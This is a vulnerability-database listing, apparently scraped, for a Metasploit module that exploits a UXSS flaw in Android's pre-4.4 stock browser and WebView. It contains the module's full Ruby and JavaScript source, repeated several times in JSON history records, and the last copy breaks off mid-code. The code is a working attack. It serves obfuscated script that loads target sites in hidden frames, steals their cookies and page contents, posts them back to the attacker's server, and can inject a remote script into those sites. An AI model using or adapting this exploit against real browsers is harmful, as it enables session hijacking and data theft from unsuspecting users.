ID MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::JSObfu
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
'Description' => %q{
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
all versions of Android's open source stock browser before 4.4, and Android apps running
on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
to scrape both cookie data and page contents from a vulnerable browser window.
Target URLs that use X-Frame-Options can not be exploited with this vulnerability.
Some sample UXSS scripts are provided in data/exploits/uxss.
},
'Author' => [
'Rafay Baloch', # Original discovery, disclosure
'joev' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [
[ 'WebServer' ]
],
'PassiveActions' => [
'WebServer'
],
'References' => [
[ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],
[ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],
[ 'URL', 'http://trac.webkit.org/changeset/96826' ]
],
'DefaultAction' => 'WebServer',
'DisclosureDate' => "Oct 4 2014"
))
register_options([
OptString.new('TARGET_URLS', [
true,
"The comma-separated list of URLs to steal.",
'http://example.com'
]),
OptString.new('CUSTOM_JS', [
false,
"A string of javascript to execute in the context of the target URLs.",
''
]),
OptString.new('REMOTE_JS', [
false,
"A URL to inject into a script tag in the context of the target URLs.",
''
])
])
end
def on_request_uri(cli, request)
print_status("Request '#{request.method} #{request.uri}'")
if request.method.downcase == 'post'
collect_data(request)
send_response_html(cli, '')
else
payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
domains = datastore['TARGET_URLS'].split(',')
script = js_obfuscate <<-EOS
var targets = JSON.parse(atob("#{Rex::Text.encode_base64(JSON.generate(domains))}"));
targets.forEach(function(target, i){
var obj = document.createElement('object');
obj.setAttribute('data', target);
obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');
obj.onload = function() {
obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+
'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(custom_js)}"'+
'));}void(0);';
obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';
};
document.body.appendChild(obj);
});
window.addEventListener('message', function(e) {
var data = JSON.parse(e.data);
var x = new XMLHttpRequest;
x.open('POST', window.location, true);
x.send(e.data);
}, false);
EOS
html = <<-EOS
<html>
<body>
<script>
#{script}
</script>
</body>
</html>
EOS
print_status("Sending initial HTML ...")
send_response_html(cli, html)
end
end
def collect_data(request)
begin
response = JSON.parse(request.body)
rescue JSON::ParserError
print_error "Invalid JSON request."
else
url = response['url']
if response && url
file = store_loot("android.client", "text/plain", cli.peerhost, request.body, "aosp_uxss_#{url}", "Data pilfered from uxss")
print_good "Collected data from URL: #{url}"
print_good "Saved to: #{file}"
end
end
end
def custom_js
rjs_hook + datastore['CUSTOM_JS']
end
def rjs_hook
remote_js = datastore['REMOTE_JS']
if remote_js.present?
"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); "
else
''
end
end
def run
exploit
end
end
{"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-11-02T01:15:34", "history": [{"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-05-03T20:42:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/auxiliary/gather/android_object_tag_webview_uxss", "reporter": "Rapid7", "references": ["http://trac.webkit.org/changeset/96826", "http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef"], "cvelist": [], "lastseen": "2017-07-02T23:30:18", "history": [], "viewCount": 31, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\n\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-07-02T23:30:18", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/auxiliary/gather/android_object_tag_webview_uxss", "reporter": "Rapid7", "references": ["http://trac.webkit.org/changeset/96826", "http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef"], "cvelist": [], "lastseen": "2017-07-24T20:00:47", "history": [], "viewCount": 32, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-07-24T20:00:47", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:29:35", "history": [], "viewCount": 47, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-08-21T15:29:35", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-26T23:38:39", "history": [], "viewCount": 47, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-10-26T23:38:39", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-27T01:39:40", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2017-10-27T01:39:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = 